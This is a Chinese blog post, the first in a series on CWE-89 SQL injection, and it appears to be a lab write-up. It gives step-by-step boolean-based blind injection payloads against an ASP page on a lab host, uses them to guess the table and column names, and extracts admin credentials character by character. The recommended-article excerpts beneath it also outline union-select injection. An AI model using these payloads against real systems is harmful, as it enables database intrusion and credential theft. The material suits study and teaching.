【软件安全】cwe-89 SQL Injection(一)

最新推荐文章于 2025-03-22 16:55:13 发布
最新推荐文章于 2025-03-22 16:55:13 发布
阅读量3.7k 收藏 2
点赞数
分类专栏: 软件安全 文章标签: 安全 sql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Li_Jiaqian/article/details/75091405
版权

NO.1

ID:CWE-89

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')


SQL注入攻击

    SQL Injection:在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

    具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

    首先,在以【.asp?id=32(数字任意)】结尾的链接依次添加语句【'】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。

    然后,添加语句【and exists(select * from admin)】,根据页面返回结果来猜解表名。

    再次,添加语句【and exists(select admin from admin)】,来猜解admin表中的列名admin

    最后,添加语句【and (select top 1 len (admin) from admin)>1】,来猜解字段长度;添加【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,来猜解字段中字符的ASCII码。

   通过以上四个步骤,反复猜解,即可得到数据库存储的用户名和密码。

由于没能找到存在sql注入漏洞的网站,谨将网络安全实验平台下的操作及截图附上)

   实验步骤:

一、找到有注入漏洞的目标网站

1.1目标站点:【http:// 192.168.1.3:8008,随便选择一个链接【`http://192.168.1.3:8008/onews.asp?id=45`】。

1.2测试链接,在链接末尾添加【'】。

1.3在链接末尾添加【 and 1=1】。

1.4在链接末尾添加【and 1=2】,返回页面显示该网站存在注入漏洞。

二、猜解表名

2.1在链接末尾添加语句【and exists(select * from admin)】,页面正常显示,说明存在表名【admin】。

三、猜解列名

3.1在连接末尾添加语句【and exists(select admin from admin)】,页面显示正常,即在表中存在admin列。

3.2同样的方法,在链接末尾添加【and exists(select password from admin)】,页面显示正常,说明存在列password

四、猜测字段内容

4.1猜测字段的长度,在连接末尾输入语句【and (select top 1 len (admin) from admin)>1】,页面显示正常,数字依次加1,进行测试,如【and (select top 1 len (admin) from admin)>5】,说明字段长度为5

4.2同样的方法,在链接末尾添加连接【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,可猜解出第一条记录的第一位字符的ASCII码为97,对应a

4.3同样的方法可以得到admin字段内容为【admin】,password字段内容为【bfpms】。


最后,欢迎大家到我的个人主页点击打开链接一起交流、学习~

常见的软件缺陷与风险
oscar999的专栏
10-06 1003
MITRE 和 OWASP 每年都会发布软件的常见和危险的弱点,软件弱点包括在软件解决方案的代码、体系结构、实现或设计中发现的缺陷、bug、漏洞或各种其他错误。 提醒开发者在软件开发的时候予以注意和防护。
渗透学习的基础和关于 渗透学习的总结OWASP TOP 10的演化
qq_52934910的博客
12-23 829
1、必备基础:HTML 与 JavaScript(xss必学)。 2、至少选择种操作系统:Windows为主要学习方向,例如:DOS命令; 3、至少选择种搭建平台服务:Apache为主要学习方向,例如:Apache配置、搭建; 4、至少选择门编程语言:PHP为主要学习方向,例如:熟悉PHP语法; 5、至少选择种数据库:Mysql为主要学习方向,例如:熟悉Mysql语句; 学会使用od pd ce 等工具 A01:2021-Broken Access Control从第五位上...
软件安全cwe-89 SQL Injection(四)
Li_Jiaqian的博客
07-13 1227
以下为CWE网站中对SQL Injection些示范,原网址:http://cwe.mitre.org/data/definitions/89.html#Detection%20Methods 有小部分是机翻,感觉这种还是重在实践,望,共同进步~ 黑客在SQL查询中添加语句,可能改变查询逻辑而绕过安全检查,或者修改后端数据库,以实现AQL注入攻击。 例1 20
软件安全cwe-89 SQL Injection(三)
Li_Jiaqian的博客
07-13 1314
万能密码注入:     用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。 针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是【Select user_id,user_type,email From users Where user_id='用户名' And password='密码'】。     由于网站后台在进行数据库查询的时候没有对
动态规划入门详解
最新发布
2302_80067378的博客
03-22 1253
等待了好久好久,今天终于可以对动态规划动手了(☆▽☆)
软件安全cwe-89 SQL Injection(二)
Li_Jiaqian的博客
07-13 995
联合查询注入技术:     首先,在链接后面添加语句【order by 11(数字任意)】,根据页面返回结果,来判断站点中的字段数目。     然后,在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,进行联合查询,来暴露可查询的字段编号。 最后,根据上步得到的字段编号,添加语句【union select 1,adm
CVE-2022-28111(Mybatis-Pagehelper)
一支花傲寒的博客
11-21 3738
CVE-2022-28111(Mybatis-Pagehelper)分页插件漏洞
CWE 4.15 - AI/ML 引入的应用缺陷
shendong70的博客
07-22 1045
近期专家们观察到越来越多的 AI/ML 造成具体的 CVE 漏洞之后,为了防范 AI/ML 对应用安全造成的影响,CWE 快速推出了 CWE 4.15 版本。
2023 年和 2024 年最具威胁的 25 种安全漏洞(CWE Top 25)
qq_42568323的博客
10-10 1709
了解这些安全漏洞并采取适当的预防措施,可以大幅降低软件开发和应用过程中潜在的安全风险。定期审查代码、实施安全测试和保持更新是保护系统安全的关键步骤。
CWE通用缺陷对照表记录
weixin_45513192的博客
10-14 5209
CWE通用缺陷对照表记录 CWE-1 : Location CWE-113 : Improper Neutralization of CRLF Sequences in HTTP Headers (‘HTTP Response Splitting’) CWE-116 : Improper Encoding or Escaping of Output CWE-118 : Improper Access of Indexable Resource (‘Range Error’) CWE-119 : Buffer
【悟空云课堂】第十二期:LDAP注入漏洞(CWE-90: Improper Neutralization of Special Elements used in an LDAP Query)
Tianqi_Wukong的博客
01-20 1002
【悟空云课堂】第十二期:LDAP注入漏洞 什么是LDAP注入漏洞? LDAP是轻量目录访问协议(Lightweight Directory Access Protocol)的缩写,提供访问目录数据库方法的服务和协议,常用于与目录数据库组成目录服务。其中目录是个为查询、浏览和搜索而优化的专业分布式数据库,它呈树状结构组织数据,就好象Linux/Unix系统中的文件目录样。目录数据库和关系数据库不同,不适于存储修改频繁的数据。 类似以下的信息适合储存在目录中: 企业员工信息,如姓名、电话、邮箱等; 公用证书
简学-SQL注入(时间盲注)
码农米格的博客
02-09 1062
简学SQL注入0x06 SQL注入的主要类型(从漏洞类型的角度) 0x06 SQL注入的主要类型(从漏洞类型的角度) SQL注入主要分为以下几种类型: 1、Boolean-based blind SQL injection(布尔型注入) http://test.com/view?id=1 and substring(version,1,1)=5 如果服务端 Mysql 版本是5.X的话,那么页面返回的内容就会和正常的请求样。 2、UNION query SQL injection(可联合查
Lodash经常使用用法总结
qq_45061876的博客
03-01 1587
Lodash是个轻量级的JavaScript工具函数库,它方便了平常开发中对数据的操做,提升了开发效率。平常开发中,般会对数据,特别是数组和对象进行各类读写等。
java代码审计手书(二)
一个码农的笔记
11-21 5343
翻译自:http://find-sec-bugs.github.io/bugs.htm 翻译:聂心明 xml解析导致xxe漏洞 漏洞特征:XXE_XMLSTREAMREADER 当xml解析程序收到不信任的输入且如果xml解析程序支持外部实体解析的时候,那么造成xml实体解析攻击(xxe) 危害1:探测本地文件内容(xxe:xml 外部实体) <?xml version="1.0" enco...
基于lodashgs的常见问题解决方案
gitblog_01099的博客
12-18 393
基于lodashgs的常见问题解决方案 lodashgs Lodash is a library that enables the use of the lodash.js library in Google Apps Script ...
软件安全cwe-78 OS Command Injection
Li_Jiaqian的博客
07-26 2331
NO.2 ID:CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') 以下为CWE网站中对OS Command Injection些示范, 原网址:http://cwe.mitre.org/data/definitions/78.ht
lodash的使用
memoryI的博客
08-29 3652
lodash是套工具库,内部封装了很多字符串、数组、对象等常见数据类型的处理函数 1.lodash的引用: lodash的引用:  import_from 'lodash' 常规数组遍历: agent.forEach(function(n,key){       agent[key].agent_id=agent[key].agent_name;       return age...
安全漏洞分类之CNNVD漏洞分类指南
明光札记
11-30 7748
凡是被国家信息安全漏洞库(CNNVD)收录的漏洞,均适用此分类规范,包括采集的公开漏洞以及收录的未公开漏洞,通用型漏洞及事件型漏洞。CNNVD将信息安全漏洞划分为26种类型,分别是:配置错误、代码问题、资源管理错误、数字错误、信息泄露、竞争条件、输入验证、缓冲区错误、格式化字符串、跨站脚本、路径遍历、后置链接、SQL注入注入、代码注入、命令注入、操作系统命令注入安全特征问题、授权问题、信任管理、加密问题、未充分验证数据可靠性、跨站请求伪造、权限许可和访问控制、访问控制错误、资料不足。
Java代码审计手册(2)
kudos123的博客
12-23 2287
此文为翻译文章(可能会出现错误),由于原地址被打入xss,所以保存留记录 目录 潜在的XPath注入(XPATH_INJECTION) 找到Struts 1端点(STRUTS1_ENDPOINT) 找到Struts 2端点(STRUTS2_ENDPOINT) 找到了Spring端点(SPRING_ENDPOINT) 禁用Spring CSRF保护(SPRING_CSRF_PROTECTION_DISABLED) Spring CSRF无限制请求映射(SPRING_CSRF_UNRESTRICTED_RE.
CWE-200漏洞浮现
08-30
CWE-200是指"信息暴露"(Information Exposure)的种常见的软件安全漏洞。当某个系统或应用程序在处理敏感信息时,没有正确地保护或隐藏这些敏感信息,就可能导致信息暴露漏洞的出现。 这类漏洞可能会暴露用户的个人身份信息、登录凭据、敏感数据等,给攻击者提供了潜在的机会进行恶意行为,如身份盗用、数据泄露等。攻击者可以通过各种方式利用这些暴露的信息,甚至可能对系统进行进步的攻击。 为了防止CWE-200漏洞的发生,开发人员应该采取以下些措施: 1. 确保在处理敏感信息时使用适当的加密和保护机制。 2. 避免在错误消息中暴露敏感信息。 3. 使用适当的访问控制和权限管理机制,限制对敏感信息的访问。 4. 对输入数据进行正确的验证和过滤,防止攻击者利用输入来获取敏感信息。 5. 定期进行安全审计和漏洞扫描,及时发现并修复潜在的信息暴露漏洞。 如果你在开发或使用软件时遇到CWE-200漏洞问题,建议及时修复漏洞,确保用户的敏感信息得到合理的保护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值